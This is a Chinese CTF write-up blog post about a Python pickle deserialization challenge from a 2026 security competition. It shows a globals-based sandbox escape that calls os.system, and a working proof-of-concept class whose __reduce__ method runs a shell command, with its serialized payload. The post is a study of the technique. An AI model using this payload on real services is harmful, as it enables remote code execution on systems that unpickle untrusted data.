急了急了,没时间了当然急了。题目有限制,所以需要从OnlineUser出发,真的很基础,但当时已经静不下去思考了()

OnlineUser.__init__.__globals__["os"].system("ls")

赛后复现就很简单。接着去请求MCP就好了。

import os, pickle,datetime
from flask import request
class OnlineUser:
"""在线用户类,用于保存登录状态信息"""
def __init__(self, username, role="user"):
self.username = username
self.role = role
self.login_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# 设置失效时间为登录时间后1小时
expiry = datetime.datetime.now() + datetime.timedelta(hours=1)
self.expiry_time = expiry.strftime("%Y-%m-%d %H:%M:%S")
self.ip_address = request.remote_addr if request else "unknown"
def __repr__(self):
return f"OnlineUser(username={self.username!r}, role={self.role!r}, login_time={self.login_time!r}, expiry_time={self.expiry_time!r})"
def __reduce__(self):
return (OnlineUser.__init__.__globals__["os"].system, ("say 你妈",))
if __name__ == "__main__":
payload = pickle.dumps(OnlineUser("aaa"), protocol=0)
print(payload)
# b'cposix\nsystem\np0\n(Vsay \\u4f60\\u5988\np1\ntp2\nRp3\n.'
pickle.loads(payload)

后纪#

傻逼平台,时间一到就关靶机,坚持到最后一分钟早就不是为了flag而做了(因为大概也出不了了)。结果一刷新说是靶机没了?非常糟糕的体验,浪费了很多时间,花费的时间和学到的知识没成正比。

分享

如果这篇文章对你有帮助,欢迎分享给更多人!

2026-软件系统安全赛-华东赛区
https://blog.chaomixian.top/posts/2026-ccsssc/
作者
炒米线
发布于
2026-03-14
许可协议
CC BY-NC-SA 4.0

部分信息可能已经过时

目录